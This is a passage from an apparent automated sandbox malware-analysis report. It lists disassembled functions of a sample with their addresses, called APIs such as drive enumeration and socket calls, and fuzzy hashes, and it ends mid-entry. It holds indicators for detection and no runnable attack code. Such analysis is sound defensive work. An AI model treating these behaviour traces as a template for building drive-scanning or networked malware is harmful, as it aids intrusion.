                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: a52076e27c8a3229b80214dbb3b86a59575b9f1b93fe24674aa28c070b667179
                                                              • Instruction ID: e07cd4ac8eca26fb34898c08358219f5f1cd6d37eb54de899a561ac23d2bcb0c
                                                              • Opcode Fuzzy Hash: a52076e27c8a3229b80214dbb3b86a59575b9f1b93fe24674aa28c070b667179
                                                              • Instruction Fuzzy Hash: FAE1DD706047029BEB22CF24C8C5B6BB7E5EF89300F144A2CF9998B291E775D944DB92
                                                              Function 070109A5 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 295COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 2cf02a3d311c62a90a68984c011a1afdf1126f08602754618c06b729dd6a7102
                                                              • Instruction ID: 18ed186edfe671bb1cf7499297c7bb81032ddbe7a7522a887507acbf0123fa85
                                                              • Opcode Fuzzy Hash: 2cf02a3d311c62a90a68984c011a1afdf1126f08602754618c06b729dd6a7102
                                                              • Instruction Fuzzy Hash: 935108FB15C115BEB202C5416B64AFE6B6DE7C7730B30862BF4A7C6202E6A44ACD8571
                                                              Function 070109FE Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 930f2d7d1138b33e71b0c99ef8ce9948d4843d4ff1d2a73e64a7460dcf9d40c8
                                                              • Instruction ID: 6cae4c93ec3f30784491b6d6d4f8331508ad7d5e9aec85356583699abb3e4ce5
                                                              • Opcode Fuzzy Hash: 930f2d7d1138b33e71b0c99ef8ce9948d4843d4ff1d2a73e64a7460dcf9d40c8
                                                              • Instruction Fuzzy Hash: 2A51F8FB15C110FD7202C5416B54AFE6B6DE7C7730B30866BF4A7C6202E6A44ACE8531
                                                              Function 07010A21 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 252COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: ba22613775c5a73ccca68fef5175e2a4d03181f7f1a5120353b22d4ac48c2cae
                                                              • Instruction ID: aa27f5a7c31e4fb502a031ec510456642389126b958f3b1cdae7444b15e7d8f7
                                                              • Opcode Fuzzy Hash: ba22613775c5a73ccca68fef5175e2a4d03181f7f1a5120353b22d4ac48c2cae
                                                              • Instruction Fuzzy Hash: CF51E7FB26C110FD7102C5416B54AFE6B6DE7C7730B30C66BF4A7DA202E6944ACA8531
                                                              Function 070109F7 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 251COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 3abf3b791cdad2a8ccf33a2d8b8e6705fcf33581b9c11348ea93dc77e5338c1f
                                                              • Instruction ID: 4ca1246084887465795f2d0858cac9a3f55578b69c23f648156b35dc727c5d9e
                                                              • Opcode Fuzzy Hash: 3abf3b791cdad2a8ccf33a2d8b8e6705fcf33581b9c11348ea93dc77e5338c1f
                                                              • Instruction Fuzzy Hash: 1A51E5FB26C110FD7102C5416B54AFE6B6DE7C7730F30862BF4A7D6202E6A44ACA9531
                                                              Function 07010A3E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: ed7aff41e30cf050e9e0b480521f46faec8c84956725d2f7dc0202e95e3cf48d
                                                              • Instruction ID: 52797c86d3db104f4099cf432830c2836b03f961471eaefb778bd72b7dca9f33
                                                              • Opcode Fuzzy Hash: ed7aff41e30cf050e9e0b480521f46faec8c84956725d2f7dc0202e95e3cf48d
                                                              • Instruction Fuzzy Hash: 1051D6FB21C114BEB202C6416B54AFE6B6DE7C7730B30867BF4A7C6602E7944AC99531
                                                              Function 07010A73 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 3f9c4c63c2867445ec43c94d4cee317283b85809ddcbdee6b767a1e7a5942047
                                                              • Instruction ID: d9579bfa177bd69a2cc9c123659c6be471294dacb8c94cd96262fc2074578710
                                                              • Opcode Fuzzy Hash: 3f9c4c63c2867445ec43c94d4cee317283b85809ddcbdee6b767a1e7a5942047
                                                              • Instruction Fuzzy Hash: 8F41E5FB21C110FE7202C6416B64AFE676DE7C7730B30C62BF4A7C6602E6A44AC99531
                                                              Function 07010B17 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 224COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 0504d4a8ff3c61593d3fc7ea7e4905cf0b2f7f6e42490bc150fad7ea08788961
                                                              • Instruction ID: a95804bacbe10e4cc53ff250a5184216188323d9c5a986b5cc2e6a18ea47bc83
                                                              • Opcode Fuzzy Hash: 0504d4a8ff3c61593d3fc7ea7e4905cf0b2f7f6e42490bc150fad7ea08788961
                                                              • Instruction Fuzzy Hash: 4D41D4FB11C115FEB202C6416B54AFE6B6DE7C7730B30C62AF4A7D6202E7A44AC98531
                                                              Function 07010A83 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 537550534cbc1057759f5e6e17187122705c1656f45484c0c1a683c9f281619c
                                                              • Instruction ID: 01077cbc5174b4c5a505f4a0b544c06efe233d0aff58febec45426ae4b422239
                                                              • Opcode Fuzzy Hash: 537550534cbc1057759f5e6e17187122705c1656f45484c0c1a683c9f281619c
                                                              • Instruction Fuzzy Hash: CF41D4FB11C110FEB202C6416B54AFE6B6DE7C7730B30C62AF4A7D6202E6A44AC99531
                                                              Function 07010ACF Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 9f6ce46da1b700a643425620ce6b83e6f7f9a7e80653989c0e9141fc7b6cf4e2
                                                              • Instruction ID: fd31320c2b421952ed0b62ada0e11414289a206698d8695639056daeaf4daf89
                                                              • Opcode Fuzzy Hash: 9f6ce46da1b700a643425620ce6b83e6f7f9a7e80653989c0e9141fc7b6cf4e2
                                                              • Instruction Fuzzy Hash: F041D7FB11C115BEB202C6416B54AFE676DE7C7730B30866AF4A7C6102E6A44AC98531
                                                              Function 07010AA0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 4d0438c649dc0f616ec57961ec4078e2aee2ce8297231179504628f3aba1a548
                                                              • Instruction ID: 0f2d9de7aae85c74e1129491ce413738732b025cbdac4050299a48f2685da065
                                                              • Opcode Fuzzy Hash: 4d0438c649dc0f616ec57961ec4078e2aee2ce8297231179504628f3aba1a548
                                                              • Instruction Fuzzy Hash: 1041E4FB11C114FEB201C6416B54AFE676DE7C7730B30C62AF4A7D6202E7A44AC99531
                                                              Function 07010AB2 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 3d1d2a78c29d5aff78ccca94b32d6d84c0fc88870758f52f05d5f88aca0ee8a2
                                                              • Instruction ID: 3251358bbfbd88ceb23dbb7197adc345a0735dcffd108ac8085c4090ff944a53
                                                              • Opcode Fuzzy Hash: 3d1d2a78c29d5aff78ccca94b32d6d84c0fc88870758f52f05d5f88aca0ee8a2
                                                              • Instruction Fuzzy Hash: 0941E7FB11C114BE7201C6416B64AFF6B6DE7C7730B30C66AF4A7D6202E7944AC98531
                                                              Function 07010AE7 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 207COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 72203e8e9d61504eef0380a687ba9367659b912ebc8954849a2ac35c4255e8cb
                                                              • Instruction ID: 611b3aa7a3505ea4312d00634c27a000642da309271df85c55382d7d23ea3653
                                                              • Opcode Fuzzy Hash: 72203e8e9d61504eef0380a687ba9367659b912ebc8954849a2ac35c4255e8cb
                                                              • Instruction Fuzzy Hash: 5041C6FB21C110FEB202C6416B54AFE676DE7C7330B30C66AF4A7D6202E7A44AC99531
                                                              Function 07010AF7 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: bc1b0b16d61058f2f6db8e4f4950c5f739df9a2229fe09ca59279c89e02a4b67
                                                              • Instruction ID: 66b1dd477e4ca9b8ac003d15a1aa94d3e0a95f8007746de69c6850883533e082
                                                              • Opcode Fuzzy Hash: bc1b0b16d61058f2f6db8e4f4950c5f739df9a2229fe09ca59279c89e02a4b67
                                                              • Instruction Fuzzy Hash: 6D41D3FB21C111BDB202C6416B54AFE676DE7C7330B30C66AF4A7D6202E7A44ACA9531
                                                              Function 07010B53 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 9c7cb96a048af187b3e9da76ddcc406bd98681a3d93752301766c76599d646d2
                                                              • Instruction ID: 7b36364a7d9f85a35038fec1591f996c261322f6d3d4f98907359236d73c950a
                                                              • Opcode Fuzzy Hash: 9c7cb96a048af187b3e9da76ddcc406bd98681a3d93752301766c76599d646d2
                                                              • Instruction Fuzzy Hash: 3A31E7F721C254FEB202C6416B54AFE277DE7C7330B30C56AF4A7C6202E6A45AC98631
                                                              Function 0027F7B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: CloseEvent
                                                              • String ID: multi.c
                                                              • API String ID: 2624557715-214371023
                                                              • Opcode ID: a6606d555aec4f2fe20f524fce77ef921c88f4b6bb8c7fa342824fde132d94d2
                                                              • Instruction ID: 274e225667fcd00388ef35551ab51dfc8a07d25bcce6631874cfb642948d136c
                                                              • Opcode Fuzzy Hash: a6606d555aec4f2fe20f524fce77ef921c88f4b6bb8c7fa342824fde132d94d2
                                                              • Instruction Fuzzy Hash: 9A511AB19283019BDB50AF309D46B573698BF41318F088478ED4D9B253FB75E528CBA3
                                                              Function 07010B71 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 167COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: db5c54718135ea0619a93b906869f9fbc560296ad8c45019b346fdf252b2b0fd
                                                              • Instruction ID: 9050f492cc4ccecf8caa8a2c8b1f43730c646d8749e052b3f6ec75ad24220934
                                                              • Opcode Fuzzy Hash: db5c54718135ea0619a93b906869f9fbc560296ad8c45019b346fdf252b2b0fd
                                                              • Instruction Fuzzy Hash: F231E5F621C115FEB201C6416B54AFE67ADE7C7330B30C56AF4A7C6202E7A45AC98531
                                                              Function 07010B6A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: c55e72da8d10147271414a6c2a0231f70d2782a35148479888c16a9fc6b9e7b7
                                                              • Instruction ID: 9d5bd45d64b314eb8003c44a05a4b347a102a8075f7d2f1374dcda0a70a4febc
                                                              • Opcode Fuzzy Hash: c55e72da8d10147271414a6c2a0231f70d2782a35148479888c16a9fc6b9e7b7
                                                              • Instruction Fuzzy Hash: 3231B2FB21C114FEB201C6416B64AFE676DE7C7330B30C66AF4A7C6202E7A45AC98531
                                                              Function 07010BBE Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 160COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 1fecc070c9e4d669898ac0ed2aee1fb83d78a5878408ed096083054b61d369e5
                                                              • Instruction ID: 6e0039da3addba8313e753d7451a1ea599ce5b55ebcae9878d4d8736a2aaa098
                                                              • Opcode Fuzzy Hash: 1fecc070c9e4d669898ac0ed2aee1fb83d78a5878408ed096083054b61d369e5
                                                              • Instruction Fuzzy Hash: A431F4F621C154FEB201C6416B64AFE6BACEBC7730B30856AF4A7D6102E6644AC98531
                                                              Function 07010BA3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: ac2669b72f365c4cba8a47fccd40e0c06554ff3b684d2f69561f53c89c8e055e
                                                              • Instruction ID: 60dc80a4c663c6857db17262b3225ba234ebf5a788165767dec4f691901d761a
                                                              • Opcode Fuzzy Hash: ac2669b72f365c4cba8a47fccd40e0c06554ff3b684d2f69561f53c89c8e055e
                                                              • Instruction Fuzzy Hash: 2431A1F621C115FEB201C6416B64AFE277DE7C7730B31C66AF4A7C6202E7A45AC98531
                                                              Function 07010BB3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 7062bd970c4cfa05eef6fc7fadc5f4646c74e1a249358a37b80519af6ced3bc3
                                                              • Instruction ID: eb749f240ca5f6411f1e52c665e3c553341f8e302b9b1a4a378e252d2aaeeeca
                                                              • Opcode Fuzzy Hash: 7062bd970c4cfa05eef6fc7fadc5f4646c74e1a249358a37b80519af6ced3bc3
                                                              • Instruction Fuzzy Hash: C131B3F621C115FEB201C6416B64AFE677DE7C7730B30C66AF4A7C6102E7A49AC98931
                                                              Function 07010BF7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: df122a75c7f313e1af721e903a7609449ff1a914280a88ed4d8369c98db682b4
                                                              • Instruction ID: 7e9c8d81dd30abda4a83e8bc0df74bb13c8220cc9fa418df3c8941bc689cce07
                                                              • Opcode Fuzzy Hash: df122a75c7f313e1af721e903a7609449ff1a914280a88ed4d8369c98db682b4
                                                              • Instruction Fuzzy Hash: 8F31B1F621C155FEB201C6416B24AFE6B7CE7C3730B31C66BF4A6C6102E7A44AC98931
                                                              Function 07010BE2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 143COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 1ab44fe4114e3c871dffc9e148c91e2d8404c19a25875e245c161bd2dd9fc1d0
                                                              • Instruction ID: 064cd6b6fdcb087f5ea881d02897b432f878000e911be06bafc0cebc87a4cbd9
                                                              • Opcode Fuzzy Hash: 1ab44fe4114e3c871dffc9e148c91e2d8404c19a25875e245c161bd2dd9fc1d0
                                                              • Instruction Fuzzy Hash: 8231A0F621C254FEB201C6416B64AFE676CE7C7730B31C66BF4A7D6102E7644AC98931
                                                              Function 07010C1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 4ac8438949f6b13a977751297e1f2194058eeb18b379971ebec7a8c56feadbe1
                                                              • Instruction ID: 937b41a0019afb40e5aa96300f56b85366cad22cb79f802a5898124b5f34be51
                                                              • Opcode Fuzzy Hash: 4ac8438949f6b13a977751297e1f2194058eeb18b379971ebec7a8c56feadbe1
                                                              • Instruction Fuzzy Hash: DB31D5F661C110BEB201C651AB54AFF3B7CE7D3730B31C66AF4A6C5101E2648ACA8931
                                                              Function 07010C6B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 242ecabaf6fca4ac1d2606c38e7bde6a1f3efefac1d7ced7533a156268e5fa15
                                                              • Instruction ID: 38555bfbacf95d0e87948ad7d038e99383e43f1455f4db0ac6b2a76e8662d425
                                                              • Opcode Fuzzy Hash: 242ecabaf6fca4ac1d2606c38e7bde6a1f3efefac1d7ced7533a156268e5fa15
                                                              • Instruction Fuzzy Hash: 8D21D3F761C111BEB201C6916B54AFF2B7CE7D3730B31C96AF4A6C5101E2688ECA8931
                                                              Function 07010C14 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 875a9ce3e04558df1b9a48110e8222a90f98b4c00ab2b82b5be806b4c8c4b4b8
                                                              • Instruction ID: b9c675c81d1fdc8b6fe710b9d7550553e684bdeda591135af40e47857b838691
                                                              • Opcode Fuzzy Hash: 875a9ce3e04558df1b9a48110e8222a90f98b4c00ab2b82b5be806b4c8c4b4b8
                                                              • Instruction Fuzzy Hash: 61218EF761C114BEB201C6426B24AFE277CE7C3730B31C56BF4A7C5101E6A49A8D9531
                                                              Function 07010C3E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 3af65ed25675f09a3f4209e0bbdbcaae1a4ea6b53eac787e782e755d7dba1999
                                                              • Instruction ID: 6234f00c788037b625f5fc3d057dbd701488228d915991e8f29c0a0406ecd82b
                                                              • Opcode Fuzzy Hash: 3af65ed25675f09a3f4209e0bbdbcaae1a4ea6b53eac787e782e755d7dba1999
                                                              • Instruction Fuzzy Hash: 1E217FF721C210BEB201C6426B14AFE6B6CE7C3730B31C56BF4A6C5101E6A48A8D9531
                                                              Function 07010C50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
